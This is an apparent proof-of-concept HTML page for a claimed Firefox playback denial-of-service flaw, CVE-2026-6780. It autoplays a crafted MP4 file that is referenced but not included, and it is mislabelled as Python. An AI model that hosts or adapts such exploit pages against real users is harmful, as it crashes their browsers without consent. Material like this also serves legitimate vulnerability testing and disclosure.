The following code is for security research and authorized testing only.
python
<!--
PoC for CVE-2026-6780
Description: This HTML file attempts to trigger the Denial of Service vulnerability in Firefox < 150.
Usage: Host this file and open it in a vulnerable version of Firefox.
-->
<!DOCTYPE html>
<html>
<head>
<title>CVE-2026-6780 PoC</title>
</head>
<body>
<h1>CVE-2026-6780 Playback DoS Test</h1>
<!--
The vulnerability is triggered in the Audio/Video Playback component.
A specifically crafted media file is loaded to cause the crash.
-->
<video controls autoplay>
<source src="exploit_cve_2026_6780.mp4" type="video/mp4">
Your browser does not support the video tag.
</video>
<script>
console.log("PoC loaded: Attempting to trigger playback bug...");
</script>
</body>
</html>